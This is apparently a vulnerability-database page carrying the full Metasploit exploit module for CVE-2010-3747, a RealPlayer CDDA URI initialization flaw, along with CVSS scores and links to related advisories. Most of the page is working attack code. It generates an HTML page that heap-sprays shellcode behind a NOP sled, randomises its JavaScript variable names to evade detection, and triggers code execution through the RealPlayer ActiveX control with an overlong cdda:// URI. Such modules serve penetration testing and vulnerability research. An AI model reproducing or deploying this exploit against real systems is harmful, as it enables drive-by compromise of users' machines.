Lucene search
Bannedit <[email protected]>, sinn3r <[email protected]>MSF:EXPLOIT-WINDOWS-BROWSER-REALPLAYER_CDDA_URI-HistoryMar 17, 2011 - 3:42 p.m.
RealNetworks RealPlayer CDDA URI Initialization Vulnerability
CVSS2
9.3
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
This module exploits an initialization flaw within RealPlayer 11/11.1 and RealPlayer SP 1.0 - 1.1.4. An abnormally long CDDA URI causes an object initialization failure. However, this failure is improperly handled and uninitialized memory executed.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'RealNetworks RealPlayer CDDA URI Initialization Vulnerability',
'Description' => %q{
This module exploits an initialization flaw within RealPlayer 11/11.1 and
RealPlayer SP 1.0 - 1.1.4. An abnormally long CDDA URI causes an object
initialization failure. However, this failure is improperly handled and
uninitialized memory executed.
},
'License' => MSF_LICENSE,
'Author' =>
[
'bannedit',
'sinn3r'
],
'References' =>
[
[ 'CVE', '2010-3747' ],
[ 'OSVDB', '68673'],
[ 'BID', '44144' ],
[ 'ZDI', '10-210'],
[ 'URL', 'http://service.real.com/realplayer/security/10152010_player/en/']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'RealPlayer SP 1.0 - 1.1.4 Universal', { 'Ret' => 0x21212121 } ],
[ 'RealPlayer 11.0 - 11.1 Universal', { 'Ret' => 0x21212121 } ],
],
'Privileged' => false,
'DisclosureDate' => '2010-11-15',
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
mytarget = target
# the ret slide gets executed via call [esi+45b]
retslide = [mytarget.ret].pack('V') * 750
cdda_uri = "cdda://" + retslide
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
nops = make_nops(8)
nop_sled = Rex::Text.to_unescape(nops, Rex::Arch.endian(target.arch))
# Randomize Javascript variables
var_blocks = rand_text_alpha(rand(6)+3)
var_shellcode = rand_text_alpha(rand(6)+3)
var_index = rand_text_alpha(rand(6)+3)
var_nopsled = rand_text_alpha(rand(6)+3)
spray_func = rand_text_alpha(rand(6)+3)
obj_id = rand_text_alpha(rand(6)+3)
randnop = rand_text_alpha(rand(100) + 1)
html = <<-EOS
<html>
<head>
<script>
function #{spray_func}() {
#{var_blocks} = new Array();
var #{var_shellcode} = unescape("#{shellcode}");
var #{randnop} = "#{nop_sled}";
var #{var_nopsled} = unescape(#{randnop});
do { #{var_nopsled} += #{var_nopsled} } while (#{var_nopsled}.length < 8200);
for (#{var_index}=0; #{var_index} < 19000; #{var_index}++)
#{var_blocks}[#{var_index}] = #{var_nopsled} + #{var_shellcode};
}
#{spray_func}();
</script>
</head>
<object id=#{obj_id} classid='clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA' width=0 height=0>
<param name="CONTROLS" value="ControlPanel">
<param name="src" value="#{cdda_uri}">
</object>
<script language="VBScript">
#{obj_id}.DoPlay
</script>
</html>
EOS
print_status("Sending #{self.name} HTML")
send_response(cli, html, { 'Content-Type' => 'text/html' })
end
end
Related
cve
cve
CVE-2010-3747
2010-10-19 00:00:01
saint
saint
RealNetworks RealPlayer CDDA URI Uninitialized Pointer Code Execution
2010-10-22 00:00:00
RealNetworks RealPlayer CDDA URI Uninitialized Pointer Code Execution
2010-10-22 00:00:00
RealNetworks RealPlayer CDDA URI Uninitialized Pointer Code Execution
2010-10-22 00:00:00
prion
prion
Null pointer dereference
2010-10-19 00:00:00
exploitdb
exploitdb
RealNetworks RealPlayer - CDDA URI Initialization (Metasploit)
2011-03-17 00:00:00
zdt
zdt
RealNetworks RealPlayer CDDA URI Initialization Vulnerability
2011-03-18 00:00:00
nvd
nvd
CVE-2010-3747
2010-10-19 00:00:01
checkpoint_advisories
checkpoint_advisories
RealNetworks RealPlayer CDDA URI Uninitialized Pointer Code Execution (CVE-2010-3747)
2010-10-28 00:00:00
RealPlayer CDDA URI Code Execution - Ver2 (CVE-2010-3747)
2014-01-28 00:00:00
d2
d2
DSquare Exploit Pack: D2SEC_CDDAURI
2010-10-19 00:00:00
zdi
zdi
cvelist
cvelist
CVE-2010-3747
2010-10-18 22:00:00
packetstorm
packetstorm
RealNetworks RealPlayer CDDA URI Initialization Vulnerability
2011-03-18 00:00:00
nessus
nessus
Real Networks RealPlayer SP < 1.1.5 Multiple Vulnerabilities
2010-08-27 00:00:00
RealPlayer for Windows < Build 12.0.0.879 Multiple Vulnerabilities
2010-08-27 00:00:00
openvas
openvas
RealNetworks RealPlayer Multiple Vulnerabilities (Windows) - Dec10
2010-12-29 00:00:00
RealNetworks RealPlayer Multiple Vulnerabilities (Dec 2010) - Windows
2010-12-29 00:00:00
CVSS2
9.3
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
Related for MSF:EXPLOIT-WINDOWS-BROWSER-REALPLAYER_CDDA_URI-